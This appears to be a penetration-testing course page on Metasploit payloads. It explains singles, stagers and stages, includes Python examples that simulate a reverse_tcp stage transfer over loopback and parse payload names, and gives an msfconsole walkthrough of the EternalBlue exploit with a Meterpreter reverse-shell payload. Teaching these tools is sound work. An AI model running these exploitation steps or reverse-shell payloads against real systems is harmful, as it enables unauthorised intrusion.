Payloads
It is important to note that payloads and exploits depend heavily on the target's environment: operating system, architecture, service version and similar details. An exploit is built around specifics such as function return addresses and register state, so a payload that works on one build of a service may not work on another, and at times we will be crafting our own.
Payloads
A payload is the code that runs on the target once a vulnerability has been exploited successfully: the exploit delivers it, the payload does the work (spawn a shell, run a command, load Meterpreter). There are three types of payload modules in Metasploit:
Singles: windows/shell_bind_tcp. A single contains the entire shellcode for the selected task in one self-contained blob, so it needs no second-stage download over the network and is more stable than a staged payload. The price is size: an all-in-one payload is heavier than the other types and may not fit an exploit with a small buffer.
Stagers: windows/shell/bind_tcp (here bind_tcp is the stager). A stager is the small piece of code the exploit actually delivers. Its only job is to set up the network connection, either by binding a port on the target or by connecting back to the handler waiting on the attacker's machine, and then to read the stage over that connection into memory and jump to it. Stagers are deliberately small so they fit where a single would not.
Stagers that write the stage onto the stack and run it there fail on systems where the NX bit and DEP make the stack non-executable.
NX-aware stagers first allocate executable memory for the stage (on Windows, VirtualAlloc with PAGE_EXECUTE_READWRITE) and receive it into that buffer, which is why they are bigger.
Stages: windows/shell/bind_tcp (here shell is the stage). The stage is the payload component the stager downloads and loads: a command shell, Meterpreter, a VNC server. It carries the real functionality and arrives over the connection the stager opened, so its size does not have to fit the exploit's buffer.
Staged Payloads
As mentioned above, a staged payload splits the exploitation process into modules: a small stager that the exploit delivers, and one or more stages that are fetched over the network once the stager has a connection. Keeping each component small and sending the bulk of the code only after a connection exists makes the exploit easier to fit and can make the pieces harder for AV or IPS to pick up, although the stage transfer on the wire is itself a well-known network signature. If all the stages work with no issues, the attacker gains the remote access they were after.
Meterpreter, for example, is delivered as a DLL that the stager loads directly into memory using reflective DLL injection, so the stage is never written to disk, and it then talks to the handler over the connection the stager opened. Once the stage is running we get a meterpreter prompt that looks like msfconsole, except that the commands we execute are run on the target.
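The stager/stage hand-off described above, as an added Python example that is not part of the original page: a handler thread plays the attacker side and a stager function plays the target side of a reverse_tcp stager, exchanging a constructed stand-in stage over loopback. The wire format (4-byte little-endian length, then the stage) matches what Metasploit's reverse_tcp stagers read; the MAX_STAGE cap and the truncation switch are additions of this example, not Metasploit behaviour.

```python
import hashlib
import socket
import struct
import threading

# Constructed stand-in for a stage (in Metasploit this would be the shell
# or Meterpreter stage); deliberately larger than one recv() returns.
FAKE_STAGE = bytes(range(256)) * 300          # 76,800 bytes

# A real stager trusts whatever length the handler sends; this cap is a
# hardening choice of this example, not Metasploit behaviour.
MAX_STAGE = 64 * 1024 * 1024


def handler(listener: socket.socket, stage: bytes, truncate_at=None) -> None:
    """Attacker side (msfconsole's handler): accept the stager's connection
    and send the stage as a 4-byte little-endian length followed by its body.
    truncate_at simulates a handler that dies mid-transfer (example-only)."""
    conn, _ = listener.accept()
    with conn:
        wire = struct.pack("<I", len(stage)) + stage
        conn.sendall(wire if truncate_at is None else wire[:truncate_at])


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes; TCP may deliver the stage in many small pieces."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(min(65536, n - len(buf)))
        if not chunk:
            raise ConnectionError("connection closed before the stage was fully received")
        buf += chunk
    return bytes(buf)


def stager(lhost: str, lport: int) -> bytes:
    """Target side: what a reverse_tcp stager does, minus jumping into the stage.
    1. connect back to LHOST:LPORT
    2. read a 4-byte length
    3. allocate a buffer for it (VirtualAlloc with PAGE_EXECUTE_READWRITE on
       Windows; this allocation is what an NX-aware stager adds)
    4. recv the stage into that buffer, then execute it."""
    with socket.create_connection((lhost, lport)) as s:
        (length,) = struct.unpack("<I", recv_exact(s, 4))
        if length > MAX_STAGE:
            raise ValueError(f"refusing to allocate {length} bytes for a stage")
        stage = recv_exact(s, length)
    return stage            # a real stager would now call into this buffer


def run_stage_transfer(stage: bytes = FAKE_STAGE, truncate_at=None) -> dict:
    """Run handler and stager against each other over loopback and report."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))               # ephemeral port
    listener.listen(1)
    lport = listener.getsockname()[1]
    t = threading.Thread(target=handler, args=(listener, stage, truncate_at))
    t.start()
    try:
        received = stager("127.0.0.1", lport)
    finally:
        t.join()
        listener.close()
    return {
        "length": len(received),
        "matches": received == stage,
        "sha256": hashlib.sha256(received).hexdigest(),
    }


if __name__ == "__main__":
    print(run_stage_transfer())
```

The point to take from it: everything the target receives before the length-prefixed blob is the whole stager, which is why it can be tiny, and everything after it is the stage, which can be as big as the handler likes. A handler that drops the connection part way through leaves the stager with an incomplete buffer, which is the failure mode behind many "session opened but died immediately" reports.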
Searching, Selecting and using payloads
msf6 > use <exploit>
# grep narrows down the output of show payloads to matching lines:
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter show payloads
...
# -c only counts the matching lines:
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep -c meterpreter show payloads
...
# Chained grep behaves like a pipeline: a line must match both terms:
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter grep reverse_tcp show payloads
...
# Setting the payload: the index column survives the grep, so the number
# shown next to the payload can be used directly (its full path works too):
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload <Number Of Payload>
...
# After setting a payload we have to set its options. msfconsole hands commands
# it does not know to the operating system shell, so ifconfig runs locally and
# tells us which address to use as LHOST:
msf6 exploit(windows/smb/ms17_010_eternalblue) > ifconfig
...
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <our-ip>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target-ip>
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
...
meterpreter > help
...
| Payload | Description |
| --- | --- |
| generic/custom | Generic listener, multi-use |
| generic/shell_bind_tcp | Generic listener, multi-use, normal shell, TCP connection binding |
| generic/shell_reverse_tcp | Generic listener, multi-use, normal shell, reverse TCP connection |
| windows/x64/exec | Executes an arbitrary command (Windows x64) |
| windows/x64/loadlibrary | Loads an arbitrary x64 library path |
| windows/x64/messagebox | Spawns a dialog via MessageBox using a customizable title, text & icon |
| windows/x64/shell_reverse_tcp | Normal shell, single payload, reverse TCP connection |
| windows/x64/shell/reverse_tcp | Normal shell, stager + stage, reverse TCP connection |
| windows/x64/shell/bind_ipv6_tcp | Normal shell, stager + stage, IPv6 bind TCP stager |
| windows/x64/meterpreter/$ | Meterpreter payload + varieties above |
| windows/x64/powershell/$ | Interactive PowerShell sessions + varieties above |
| windows/x64/vncinject/$ | VNC Server (Reflective Injection) + varieties above |
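The naming convention that separates singles from staged payloads (shell_reverse_tcp versus shell/reverse_tcp) and the chained grep from the msfconsole listing, as an added Python example that is not part of the original page: it parses a payload path into platform, arch, stage and stager, and applies the same AND-filter the chained grep does. The sample list is constructed from the table above, with the two Meterpreter paths as concrete expansions of the `$` wildcard rows; the architecture set and the rule that a single's stager part starts at bind_/reverse_/find_ are assumptions of this example, not something Metasploit exposes.

```python
import re

# Architecture tokens that may appear between the platform and the payload
# name (assumed list for this example; extend as needed).
ARCHES = {"x86", "x64", "aarch64", "armle", "armbe", "mipsle", "mipsbe",
          "mips64", "mips64le", "ppc", "ppc64", "ppc64le", "sparc", "sparc64",
          "riscv32le", "riscv64le", "zarch", "cbea", "cbea64"}

# Heuristic for singles: the stager-like suffix begins at bind_/reverse_/find_.
_SINGLE_RE = re.compile(r"^(.+?)_((?:bind|reverse|find)_.*)$")

# Constructed from the table on this page; the two Meterpreter entries expand
# the `windows/x64/meterpreter/$` wildcard row into real payload names.
SAMPLE_PAYLOADS = [
    "generic/custom",
    "generic/shell_bind_tcp",
    "generic/shell_reverse_tcp",
    "windows/x64/exec",
    "windows/x64/loadlibrary",
    "windows/x64/messagebox",
    "windows/x64/shell_reverse_tcp",
    "windows/x64/shell/reverse_tcp",
    "windows/x64/shell/bind_ipv6_tcp",
    "windows/x64/meterpreter/reverse_tcp",
    "windows/x64/meterpreter_reverse_https",
]


def parse_payload_path(path: str) -> dict:
    """Split a Metasploit payload path into its parts.
    Two components after platform/arch means stage/stager (staged);
    one component means a single, whose name may embed the connection type."""
    parts = path.strip().split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {path!r}")
    platform, rest = parts[0], parts[1:]
    if platform == "cmd" and len(rest) > 1:       # cmd/unix/..., cmd/windows/...
        platform = f"cmd/{rest.pop(0)}"
    arch = rest.pop(0) if rest and rest[0] in ARCHES else None
    if len(rest) == 2:
        stage, stager, staged = rest[0], rest[1], True
    elif len(rest) == 1:
        m = _SINGLE_RE.match(rest[0])
        stage, stager = (m.group(1), m.group(2)) if m else (rest[0], None)
        staged = False
    else:
        raise ValueError(f"unexpected payload path layout: {path!r}")
    return {"path": path, "platform": platform, "arch": arch,
            "stage": stage, "stager": stager, "staged": staged}


def filter_payloads(paths, *terms):
    """AND-filter, like chaining `grep a grep b show payloads` in msfconsole.
    Plain substring match, so 'shell' also hits 'powershell', exactly as grep does."""
    return [p for p in paths if all(t in p for t in terms)]


def summarize(paths) -> dict:
    """Counts, the way `grep -c` would, but split by single vs staged."""
    parsed = [parse_payload_path(p) for p in paths]
    return {"total": len(parsed),
            "staged": sum(p["staged"] for p in parsed),
            "single": sum(not p["staged"] for p in parsed)}


if __name__ == "__main__":
    for p in filter_payloads(SAMPLE_PAYLOADS, "shell", "reverse_tcp"):
        info = parse_payload_path(p)
        kind = "staged" if info["staged"] else "single"
        print(f"{p:40} {kind:6} stage={info['stage']} stager={info['stager']}")
    print(summarize(SAMPLE_PAYLOADS))
```

The single-versus-staged decision rests only on the path layout and is reliable; the stage/stager split inside a single's name is a naming heuristic, which is why exec, messagebox and custom come back with no stager at all: they never open a connection.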
Other payloads heavily used by penetration testers during security assessments are those of Empire and Cobalt Strike. They are outside the scope of this course, but feel free to research them in your free time, as they give significant insight into how professional penetration testers perform assessments against high-value targets.